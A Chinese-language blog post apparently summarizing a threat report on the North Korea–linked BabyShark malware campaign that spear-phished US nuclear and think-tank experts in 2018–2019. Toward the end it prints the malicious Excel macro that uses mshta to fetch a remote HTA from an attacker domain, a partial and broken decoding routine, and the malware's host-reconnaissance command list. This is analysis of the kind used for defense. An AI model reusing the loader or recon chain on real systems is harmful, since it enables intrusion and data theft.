特金会即将来临之际，一些美国厂商为了让特朗普在外交过程中建立优势，总会恰逢时宜的放出一些报告，下面这个报告就在近期被放出，揭露的是去年到今年的一系列疑似朝鲜攻击美国的事件，既然平底锅开了个头，接下来一周肯定会很精彩，让我们拭目以待。

分析如下：

攻击为2018年11月，通过发送邮件进行攻击，其中包含与北韩活动相关的C2的新恶意软件。

邮件的编写看起来好像是由核安保专家发送的，该专家目前在美国担任顾问。

电子邮件是使用公共电子邮件地址发送的，并附有专家姓名，主题涉及朝鲜的核问题。

这些电子邮件附有一个恶意的Excel宏文档，在执行时会导致一个新的基于Microsoft Visual Basic（VB）脚本的恶意软件系列，平底锅将其命名为“BabyShark”。

BabyShark是一种相对较新的恶意软件。

目前从VT和内部数据集中发现的最早的样本是在2018年11月。

恶意软件是通过从远程位置执行第一阶段HTA来启动的，因此它可以通过包括PE文件在内的不同文件类型以及恶意文件。

它将系统信息泄露给C2服务器，并维持系统持久性，并等待攻击者的进一步指令。

执行流程如下

可以确定的针对目标或相关事件为

美国一所大学当时正在召开有关朝鲜无核化问题的会议
位于美国的研究机构，作为国家安全问题的智库，以及之前提到的核专家目前的工作场所。

与该活动相关的事件链接如下

KimJongRAT:

https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf

STOLEN PENCIL (去年针对学术机构的事件):

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

投放BabyShark的几起攻击事件，从2018年11月到2019年1月都在进行投递。

所有提供BabyShark的恶意文件的诱饵内容都是用英文写的，与东北亚的地区安全问题有关。

虽然一些诱饵使用的内容是互联网上公开可用的信息，但有些使用的内容似乎并没有公开发布。

使用这种非公开内容检查文档的元数据，因此怀疑攻击者可能已经成功攻击了在美国国家安全智库中访问私人文档的人。

下列诱饵内容从互联网拷贝

下列诱饵内容未公开，且故意打码

文档包含的宏很简单，就一个远程加载hta

Sub AutoOpen()

Shell

(“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”)

End Sub

加载完hta后，会向C2发包，并使用下面的算法解包

Function Co00(c)

L=Len(c)

s=””

For jx=0 To d-1

For ix=0 To Int(L/d)-1

s=s&Mid(c,ix*d+jx+1,1)

s=s&Right(c,L-Int(L/d)*d)

Co00=s

End Function

解码后为BabyShark VB脚本首先通过添加以下注册表项，为了让Microsoft Word和Excel启用所有宏

然后它发出一系列Windows命令并将结果保存在％AppData％\ Microsoft \ ttmp.log中

whoami
hostname
ipconfig /all
net user
dir “%programfiles%”
dir “%programfiles% (x86)”
dir “%programdata%\Microsoft\Windows\Start Menu”
dir “%programdata%\Microsoft\Windows\Start Menu\Programs”
dir “%appdata%\Microsoft\Windows\Recent”
tasklist
ver
set
reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”